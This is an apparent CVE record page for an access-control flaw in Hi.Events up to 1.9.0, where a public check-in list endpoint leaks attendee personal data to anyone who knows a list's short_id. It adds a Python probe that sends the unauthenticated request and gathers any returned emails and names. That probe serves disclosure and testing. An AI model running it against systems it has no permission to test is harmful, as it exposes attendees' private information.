Description

In Hi.Events through 1.9.0, the public check-in list endpoints rely on the check-in list's short_id as their only access control. An unauthenticated attacker who knows a short_id can call GET /api/public/check-in-lists/{short_id}/attendees to retrieve the full attendee list, including email addresses and other personal information, and can also create or delete check-in records without authenticating.
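
One way to check whether a deployment is affected, as an added example that is not part of the CVE record or the Hi.Events project: the script below sends the unauthenticated GET named above and classifies the response. The base URL, the short_id, the `data` wrapper around the collection and the attendee field names (`email`, `first_name`, `last_name`) are assumptions for illustration, not details taken from the record; the sample responses are constructed so the classifier can be exercised offline.

```python
# Added example for this record: an unauthenticated probe of the Hi.Events
# public check-in list endpoint. Not Hi.Events project code. The base URL,
# short_id values and JSON response shapes below are constructed assumptions.
import json
import urllib.error
import urllib.request
from dataclasses import dataclass, field

# Endpoint path named in the description; short_id is the only parameter.
ENDPOINT = "/api/public/check-in-lists/{short_id}/attendees"

# Attendee fields whose presence in an unauthenticated response indicates PII
# exposure (assumed field names; adjust to the deployed version's schema).
PII_KEYS = ("email", "first_name", "last_name")


@dataclass
class ProbeResult:
    status: int
    exposed: bool
    attendee_count: int
    emails: list = field(default_factory=list)


def classify(status: int, body: bytes) -> ProbeResult:
    """Decide whether a response to an unauthenticated GET leaks attendee data.

    Only a 2xx carrying a list of attendee objects with PII fields counts as
    exposure. A non-2xx answer is treated as not exposed, and an empty list
    on 2xx is not proof either way (the list may simply have no attendees).
    """
    if not 200 <= status < 300:
        return ProbeResult(status, False, 0)
    try:
        data = json.loads(body.decode("utf-8", errors="replace"))
    except json.JSONDecodeError:
        return ProbeResult(status, False, 0)
    # Laravel-style resource collections wrap results in "data" (assumed shape).
    items = data.get("data", []) if isinstance(data, dict) else data
    if not isinstance(items, list):
        return ProbeResult(status, False, 0)
    records = [i for i in items if isinstance(i, dict)]
    emails = [r["email"] for r in records if isinstance(r.get("email"), str)]
    exposed = any(any(k in r for k in PII_KEYS) for r in records)
    return ProbeResult(status, exposed, len(records), emails)


def probe(base_url: str, short_id: str, timeout: float = 10.0) -> ProbeResult:
    """Send the GET with no Authorization header or cookie and classify the answer."""
    url = base_url.rstrip("/") + ENDPOINT.format(short_id=short_id)
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        # Non-2xx responses raise; the body is still read for classification.
        return classify(err.code, err.read())


# Constructed sample responses so the classifier can be exercised offline.
SAMPLE_LEAK = json.dumps({"data": [
    {"id": 1, "first_name": "Ada", "last_name": "Lovelace", "email": "ada@example.com"},
    {"id": 2, "first_name": "Alan", "last_name": "Turing", "email": "alan@example.com"},
]}).encode()
SAMPLE_DENIED = b'{"message": "Unauthenticated."}'
SAMPLE_EMPTY = b'{"data": []}'


if __name__ == "__main__":
    import sys
    # Usage: python probe.py https://events.example.test <short_id>
    base, sid = sys.argv[1], sys.argv[2]
    result = probe(base, sid)
    verdict = "EXPOSED" if result.exposed else "not exposed"
    print(f"HTTP {result.status}: {verdict}, {result.attendee_count} attendee record(s)")
```

Run it only against an instance you are authorized to test. The request deliberately carries no credentials, so a server that still honours it with a 2xx and attendee records is exhibiting the behaviour the description reports; an instance that has fixed the access control is expected to reject the unauthenticated call (401 or 403), which the classifier reports as not exposed.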

Severity (CVSS)

Base score: 8.3
Severity: High
Version: CVSS 4.0
Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
Provided by: CNA

The vector reads as network-reachable with no privileges or user interaction required, high attack complexity (consistent with the need to know a valid short_id), high confidentiality impact from the attendee data disclosure and low integrity impact from the check-in record manipulation, with no availability impact and no impact on other systems.

Weaknesses

  • CWE-359 — Exposure of Private Personal Information to an Unauthorized Actor

Affected products

Vendor: HiEventsDev
Product: Hi.Events
Versions: 0 to <=1.9.0 (all versions up to and including 1.9.0)

References

Authoritative sources

This page is a snapshot. For the latest enrichment and updates, view the record on CVE.org or the NVD.

Generated from the official CVE List on 30 Jun 2026 07:04 UTC.